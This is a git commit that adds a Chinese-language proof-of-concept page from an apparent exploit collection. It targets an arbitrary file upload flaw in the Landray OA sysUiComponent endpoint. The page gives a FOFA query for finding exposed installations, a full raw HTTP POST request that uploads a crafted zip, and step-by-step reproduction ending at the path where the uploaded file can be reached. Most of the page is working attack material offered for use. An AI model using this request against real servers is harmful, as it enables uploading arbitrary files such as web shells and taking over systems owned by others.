Create 蓝凌OAsysUiComponent 文件存在任意文件上传漏洞.md

2023-11-16 20:39:18 +08:00 · 2023-11-16 20:39:18 +08:00 · cbb59c2cc3
commit cbb59c2cc3
parent 33580230dd
1 changed files with 56 additions and 0 deletions
--- a/文件存在任意文件上传漏洞.md
+++ b/文件存在任意文件上传漏洞.md
@ -0,0 +1,56 @@
+## 蓝凌OAsysUiComponent 文件存在任意文件上传漏洞
+
+## fofa
+```
+app="Landray-OA系统"
+
+```
+
+
+## poc
+![c9857f5370d4abd1547fa7cb1988a18a](https://github.com/wy876/POC/assets/139549762/ee361dae-cfa2-4eae-910f-501331731347)
+
+```
+POST /sys/ui/sys_ui_component/sysUiComponent.do?method=getThemeInfo&s_ajax=true HTTP/1.1
+Host: IP:PORT
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://.com/sys/ui/sys_ui_component/sysUiComponent.do?method=upload
+Content-Length: 474
+Content-Type: multipart/form-data; boundary=---------------------------15610248407689
+Cookie: SESSION=YmI0OGMyZDQtZDE0NC00MTQ2LWJmMzMtNWE5NDMwOTYxM2Ex
+DNT: 1
+Connection: close
+
+-----------------------------15610248407689
+Content-Disposition: form-data; name="file"; filename="test.zip"
+Content-Type: application/x-zip-compressed
+
+PKx3;x4;x14;
+-----------------------------15610248407689
+```
+## 漏洞复现
+创建component.ini文件，内容为：
+```
+id=2023
+name=check.txt
+```
+创建上传check.txt文件
+```
+1111
+```
+然后使用压缩软件，将两个文件压缩成一个压缩包，文件名check.zip
+
+
+最后上传即可。上传成功后访问路径/resource/ui-component/2023/check.txt
+
+
+## 漏洞来源
+```
+https://mp.weixin.qq.com/s/xhwmFuItG8ZoiuGrwR5bnw
+```
+
+